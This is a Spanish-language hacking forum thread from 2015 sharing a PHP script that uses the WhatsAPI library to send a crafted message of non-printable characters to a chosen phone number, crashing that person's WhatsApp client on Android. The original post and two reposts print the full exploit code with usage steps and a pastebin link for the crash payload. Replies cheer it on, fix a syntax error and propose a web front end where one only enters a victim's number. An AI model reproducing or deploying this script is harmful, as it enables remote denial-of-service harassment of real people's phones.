[PHP] Crashear WhatsApp usando WhatsAPI

  • 8 Respuestas
  • 8976 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado elrodrix

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

[PHP] Crashear WhatsApp usando WhatsAPI

  • en: Febrero 05, 2015, 09:52:54 am
Que tal?. Les traigo un pequeño script en php que crashea el app de whatsapp en Android, que hasta el día de la fecha funciona. Pero esta vez usando un API en php de whatsapp; WhatsAPI.

Modo de uso de script
Código: Solo los usuarios pueden ver los links. Registrate o Ingresar
[email protected]:~# php wacrash.php 549XXXXXXXXXX
Recuerden que el num de contacto que van a crashear debe ser de 13 dígitos. En la variable $msg deben copiar y pegar el contenido del pastebin que dejo en el comentario, donde se encuentran los caracteres especiales para crashear whatsapp.

Código: PHP
  1. <?php
  2.  
  3. /*
  4.  *      Title: WhatsApp Remote Crash with PHP
  5.  *      Product: WhatsApp
  6.  *      Vendor Homepage: http://www.whatsapp.com
  7.  *      Vulnerable Version(s): 2.11.476
  8.  *      Tested on: WhatsApp v2.11.476 on Samsung Galaxy S4 2015 -Android 4.3
  9.  *      Mirror: http://pastebin.com/Ktu45GN0
  10.  *      Date: 05/02/2015
  11.  *
  12.  *      Author Exploit:
  13.  *              Rodrigo Avila - @el_rodrix - <[email protected]>
  14.  *      Credits:
  15.  *              Daniel Godoy - @0xhielasangre - <[email protected]>
  16.  *              Gonza Cabrera - @Gonnza_Cabrera - <[email protected]>
  17.  *
  18.  *      Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
  19.  *           http://underc0de.org/foro/android/(poc)-crashear-la-app-de-un-contacto-de-whatsapp-(android)/msg82880/
  20.  *                 http://www.exploit-db.com/exploits/35637/
  21.  *                 http://www.exploit-db.com/exploits/32865/
  22.  *
  23.  *      Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
  24.  *      It uses WhatsAPI library, that provides us with the options of registration, reading/sending messages, and even
  25.  *      engaging in an interactive conversation over WhatsApp protocol
  26.  */
  27.  
  28. require 'src/whatsprot.class.php';
  29.  
  30. function fgets_u($pStdn)
  31. {
  32.     $pArr = Solo los usuarios pueden ver los links. Registrate o Ingresar($pStdn);
  33.  
  34.     if (false === ($num_changed_streams = Solo los usuarios pueden ver los links. Registrate o Ingresar($pArr, $write = NULL, $except = NULL, 0))) {
  35.         print("\$ 001 Socket Error : UNABLE TO WATCH STDIN.\n");
  36.  
  37.         return FALSE;
  38.     } elseif ($num_changed_streams > 0) {
  39.         return Solo los usuarios pueden ver los links. Registrate o Ingresar(Solo los usuarios pueden ver los links. Registrate o Ingresar($pStdn, 1024));
  40.     }
  41.     return null;
  42. }
  43. $nickname = "RemoteExecution";
  44. $sender = "549XXXXXXXXXX"; // Mobile number with country code (but without + or 00)
  45. $imei = ""; // MAC Address for iOS IMEI for other platform (Android/etc)
  46. $password = "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // Password you received from WhatsApp
  47. $msg = "RemoteExecution"; //Copy paste and send this message -> http://pastebin.com/bStYBbpd
  48. $usage = "USAGE: ".$_SERVER['argv'][0]." <phone>\n \tphone: full number including country code, without '+' or '00'\n";
  49.  
  50. if ($argc < 2) {
  51.     echo $usage;
  52.     Solo los usuarios pueden ver los links. Registrate o Ingresar(1);
  53. }
  54.  
  55. if (Solo los usuarios pueden ver los links. Registrate o Ingresar($_SERVER['argv'][1])){
  56.    if (Solo los usuarios pueden ver los links. Registrate o Ingresar($_SERVER['argv'][1]) == 13){
  57.       $dst = $_SERVER['argv'][1];
  58.       echo "[] Logging in as '$nickname' ($sender)\n";
  59.       $wa = new WhatsProt($sender, $imei, $nickname, false);
  60.  
  61.       $wa->connect();
  62.       $wa->loginWithPassword($password);
  63.  
  64.       echo "\n[] Send message to $dst: $msg\n";
  65.       $wa->sendMessage($dst , $msg);
  66.       echo "\n";
  67.       Solo los usuarios pueden ver los links. Registrate o Ingresar(0);
  68.    }else{
  69.       echo $usage;
  70.    }
  71. }else{
  72.    echo $usage;
  73. }
  74.  

Adjunto screenshot del momento que crashea el app de whatsapp en Android. Para esta PoC se utilizo un Samsung Galaxy S4, con WhatsApp+ v6.65.

Información del dispositivo:


WhatsApp+ crashea:


WhatsApp+ crashea:


Información de WhatsApp app:


Espero que les guste. Saludos.
« Última modificación: Febrero 05, 2015, 06:13:38 pm por elrodrix »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5636
  • Actividad:
    56.67%
  • Country: ar
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email

Re:[PHP] Crashear WhatsApp usando WhatsAPI

  • en: Febrero 05, 2015, 10:00:00 am
Muy bueno bro!
Te dejo +1
Seguro que si lo ve fermino, se pondrá a jugar con esto xD

Saludos!
ANTRAX


Desconectado elrodrix

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[PHP] Crashear WhatsApp usando WhatsAPI

  • en: Febrero 05, 2015, 10:11:55 am
Solo los usuarios pueden ver los links. Registrate o Ingresar
Muy bueno bro!
Te dejo +1
Seguro que si lo ve fermino, se pondrá a jugar con esto xD

Saludos!
ANTRAX

Gracias. La idea es esa, jugar jaja. Saludos

Desconectado JNIOR

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[PHP] Crashear WhatsApp usando WhatsAPI

  • en: Febrero 05, 2015, 11:13:08 am
Se ve interesante!! ay q probarlooo!

Desconectado DeBobiPro

  • *
  • Moderador
  • Mensajes: 319
  • Actividad:
    23.33%
  • Reputación 6
  • Como no sabía que era imposible, lo hice.
    • Ver Perfil

Re:[PHP] Crashear WhatsApp usando WhatsAPI

  • en: Febrero 05, 2015, 04:27:26 pm
interesante, pero agrego un punto y coma ( ; ) que falta en la línea 47, por si alguien lo quiere probar y no le funciona :3


Saludos!
Código: PHP
  1. <?php
  2.  
  3. /*
  4.  *      Title: WhatsApp Remote Crash with PHP
  5.  *      Product: WhatsApp
  6.  *      Vendor Homepage: http://www.whatsapp.com
  7.  *      Vulnerable Version(s): 2.11.476
  8.  *      Tested on: WhatsApp v2.11.476 on Samsung Galaxy S4 2015 -Android 4.3
  9.  *      Mirror: http://pastebin.com/Ktu45GN0
  10.  *      Date: 05/02/2015
  11.  *
  12.  *      Author Exploit:
  13.  *              Rodrigo Avila - @el_rodrix - <[email protected]>
  14.  *      Credits:
  15.  *              Daniel Godoy - @0xhielasangre - <[email protected]>
  16.  *              Gonza Cabrera - @Gonnza_Cabrera - <[email protected]>
  17.  *
  18.  *      Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
  19.  *                  http://underc0de.org/foro/android/(poc)-crashear-la-app-de-un-contacto-de-whatsapp-(android)/msg82880/
  20.  *                 http://www.exploit-db.com/exploits/35637/
  21.  *                 http://www.exploit-db.com/exploits/32865/
  22.  *
  23.  *      Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
  24.  *      It uses WhatsAPI library, that provides us with the options of registration, reading/sending messages, and even
  25.  *      engaging in an interactive conversation over WhatsApp protocol
  26.  */
  27.  
  28. require 'src/whatsprot.class.php';
  29.  
  30. function fgets_u($pStdn)
  31. {
  32.     $pArr = Solo los usuarios pueden ver los links. Registrate o Ingresar($pStdn);
  33.  
  34.     if (false === ($num_changed_streams = Solo los usuarios pueden ver los links. Registrate o Ingresar($pArr, $write = NULL, $except = NULL, 0))) {
  35.         print("\$ 001 Socket Error : UNABLE TO WATCH STDIN.\n");
  36.  
  37.         return FALSE;
  38.     } elseif ($num_changed_streams > 0) {
  39.         return Solo los usuarios pueden ver los links. Registrate o Ingresar(Solo los usuarios pueden ver los links. Registrate o Ingresar($pStdn, 1024));
  40.     }
  41.     return null;
  42. }
  43. $nickname = "RemoteExecution";
  44. $sender = "549XXXXXXXXXX"; // Mobile number with country code (but without + or 00)
  45. $imei = ""; // MAC Address for iOS IMEI for other platform (Android/etc)
  46. $password = "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // Password you received from WhatsApp
  47. $msg = "RemoteExecution"; //Copy paste and send this message -> http://pastebin.com/bStYBbpd
  48. $usage = "USAGE: ".$_SERVER['argv'][0]." <phone>\n \tphone: full number including country code, without '+' or '00'\n";
  49.  
  50. if ($argc < 2) {
  51.     echo $usage;
  52.     Solo los usuarios pueden ver los links. Registrate o Ingresar(1);
  53. }
  54.  
  55. if (Solo los usuarios pueden ver los links. Registrate o Ingresar($_SERVER['argv'][1])){
  56.         if (Solo los usuarios pueden ver los links. Registrate o Ingresar($_SERVER['argv'][1]) == 13){
  57.                 $dst = $_SERVER['argv'][1];
  58.                 echo "[] Logging in as '$nickname' ($sender)\n";
  59.                 $wa = new WhatsProt($sender, $imei, $nickname, false);
  60.  
  61.                 $wa->connect();
  62.                 $wa->loginWithPassword($password);
  63.  
  64.                 echo "\n[] Send message to $dst: $msg\n";
  65.                 $wa->sendMessage($dst , $msg);
  66.                 echo "\n";
  67.                 Solo los usuarios pueden ver los links. Registrate o Ingresar(0);
  68.         }else{
  69.                 echo $usage;
  70.         }
  71. }else{
  72.         echo $usage;
  73. }
« Última modificación: Febrero 05, 2015, 04:29:23 pm por DeBobiPro »
Nivel 77 Solo los usuarios pueden ver los links. Registrate o Ingresar

Desconectado elrodrix

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[PHP] Crashear WhatsApp usando WhatsAPI

  • en: Febrero 05, 2015, 06:14:12 pm
Solo los usuarios pueden ver los links. Registrate o Ingresar
interesante, pero agrego un punto y coma ( ; ) que falta en la línea 47, por si alguien lo quiere probar y no le funciona :3


Saludos!
Código: PHP
  1. <?php
  2.  
  3. /*
  4.  *      Title: WhatsApp Remote Crash with PHP
  5.  *      Product: WhatsApp
  6.  *      Vendor Homepage: http://www.whatsapp.com
  7.  *      Vulnerable Version(s): 2.11.476
  8.  *      Tested on: WhatsApp v2.11.476 on Samsung Galaxy S4 2015 -Android 4.3
  9.  *      Mirror: http://pastebin.com/Ktu45GN0
  10.  *      Date: 05/02/2015
  11.  *
  12.  *      Author Exploit:
  13.  *              Rodrigo Avila - @el_rodrix - <[email protected]>
  14.  *      Credits:
  15.  *              Daniel Godoy - @0xhielasangre - <[email protected]>
  16.  *              Gonza Cabrera - @Gonnza_Cabrera - <[email protected]>
  17.  *
  18.  *      Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
  19.  *                  http://underc0de.org/foro/android/(poc)-crashear-la-app-de-un-contacto-de-whatsapp-(android)/msg82880/
  20.  *                 http://www.exploit-db.com/exploits/35637/
  21.  *                 http://www.exploit-db.com/exploits/32865/
  22.  *
  23.  *      Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
  24.  *      It uses WhatsAPI library, that provides us with the options of registration, reading/sending messages, and even
  25.  *      engaging in an interactive conversation over WhatsApp protocol
  26.  */
  27.  
  28. require 'src/whatsprot.class.php';
  29.  
  30. function fgets_u($pStdn)
  31. {
  32.     $pArr = Solo los usuarios pueden ver los links. Registrate o Ingresar($pStdn);
  33.  
  34.     if (false === ($num_changed_streams = Solo los usuarios pueden ver los links. Registrate o Ingresar($pArr, $write = NULL, $except = NULL, 0))) {
  35.         print("\$ 001 Socket Error : UNABLE TO WATCH STDIN.\n");
  36.  
  37.         return FALSE;
  38.     } elseif ($num_changed_streams > 0) {
  39.         return Solo los usuarios pueden ver los links. Registrate o Ingresar(Solo los usuarios pueden ver los links. Registrate o Ingresar($pStdn, 1024));
  40.     }
  41.     return null;
  42. }
  43. $nickname = "RemoteExecution";
  44. $sender = "549XXXXXXXXXX"; // Mobile number with country code (but without + or 00)
  45. $imei = ""; // MAC Address for iOS IMEI for other platform (Android/etc)
  46. $password = "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // Password you received from WhatsApp
  47. $msg = "RemoteExecution"; //Copy paste and send this message -> http://pastebin.com/bStYBbpd
  48. $usage = "USAGE: ".$_SERVER['argv'][0]." <phone>\n \tphone: full number including country code, without '+' or '00'\n";
  49.  
  50. if ($argc < 2) {
  51.     echo $usage;
  52.     Solo los usuarios pueden ver los links. Registrate o Ingresar(1);
  53. }
  54.  
  55. if (Solo los usuarios pueden ver los links. Registrate o Ingresar($_SERVER['argv'][1])){
  56.         if (Solo los usuarios pueden ver los links. Registrate o Ingresar($_SERVER['argv'][1]) == 13){
  57.                 $dst = $_SERVER['argv'][1];
  58.                 echo "[] Logging in as '$nickname' ($sender)\n";
  59.                 $wa = new WhatsProt($sender, $imei, $nickname, false);
  60.  
  61.                 $wa->connect();
  62.                 $wa->loginWithPassword($password);
  63.  
  64.                 echo "\n[] Send message to $dst: $msg\n";
  65.                 $wa->sendMessage($dst , $msg);
  66.                 echo "\n";
  67.                 Solo los usuarios pueden ver los links. Registrate o Ingresar(0);
  68.         }else{
  69.                 echo $usage;
  70.         }
  71. }else{
  72.         echo $usage;
  73. }

Corregido!. Gracias.

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 876
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
  • Twitter: @RoloMijan
    • Ver Perfil
    • Whateversec
    • Email

Re:[PHP] Crashear WhatsApp usando WhatsAPI

  • en: Febrero 05, 2015, 07:59:03 pm
Esto esta mas que genial bro, se me ocurre que se podria una api con html que haga falta solo poner el numero, si me das permiso de usar tu code me pongo a ello, no hace falta decir que con creditos tanto en la web como en el post para underc0de.

Rollth
Buen hacker mejor persona.
Solo los usuarios pueden ver los links. Registrate o Ingresar
Solo los usuarios pueden ver los links. Registrate o Ingresar
Solo los usuarios pueden ver los links. Registrate o Ingresar

Desconectado elrodrix

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[PHP] Crashear WhatsApp usando WhatsAPI

  • en: Febrero 05, 2015, 11:46:00 pm
Solo los usuarios pueden ver los links. Registrate o Ingresar
Esto esta mas que genial bro, se me ocurre que se podria una api con html que haga falta solo poner el numero, si me das permiso de usar tu code me pongo a ello, no hace falta decir que con creditos tanto en la web como en el post para underc0de.
Adelante, todo tuyo. La idea es esa, compartir y que les sirva a los demas. Saludos.

Desconectado fermino

  • *
  • Underc0der
  • Mensajes: 330
  • Actividad:
    0%
  • Reputación 1
  • Aprendiz de todo, maestro de nada...
    • Ver Perfil
    • In The Middle Of Knowledge

Re:[PHP] Crashear WhatsApp usando WhatsAPI

  • en: Febrero 21, 2015, 12:42:47 am
Solo los usuarios pueden ver los links. Registrate o Ingresar
Solo los usuarios pueden ver los links. Registrate o Ingresar
Muy bueno bro!
Te dejo +1
Seguro que si lo ve fermino, se pondrá a jugar con esto xD

Saludos!
ANTRAX

Gracias. La idea es esa, jugar jaja. Saludos

xDD
Es que esta API está genial :P

Tal vez un módulo para Solo los usuarios pueden ver los links. Registrate o Ingresar?
Visita mi blog: Solo los usuarios pueden ver los links. Registrate o Ingresar.

 

Cómo llevar dos líneas de WhatsApp en un sólo teléfono Android

Iniciado por 54NDR4

Respuestas: 5
Vistas: 5184
Último mensaje Septiembre 12, 2014, 04:48:53 pm
por vitoces
Notificaciones flotantes de WhatsApp al estilo de Facebook Messenger

Iniciado por ANTRAX

Respuestas: 0
Vistas: 2648
Último mensaje Septiembre 01, 2014, 01:09:39 pm
por ANTRAX
[WhatsApp] Herramienta para desencriptar la base de datos

Iniciado por Fukie

Respuestas: 23
Vistas: 48348
Último mensaje Mayo 14, 2017, 05:31:56 pm
por jgro
WhatsApp Plus 2015 v.6.76 Anti-baneo y Crackeado No [Root] [Esp] [SD]

Iniciado por k0rs0

Respuestas: 8
Vistas: 10082
Último mensaje Octubre 27, 2018, 04:35:18 pm
por malwarebit
Cómo usar WhatsApp en Windows

Iniciado por Stiuvert

Respuestas: 3
Vistas: 3747
Último mensaje Octubre 09, 2012, 11:56:08 am
por munter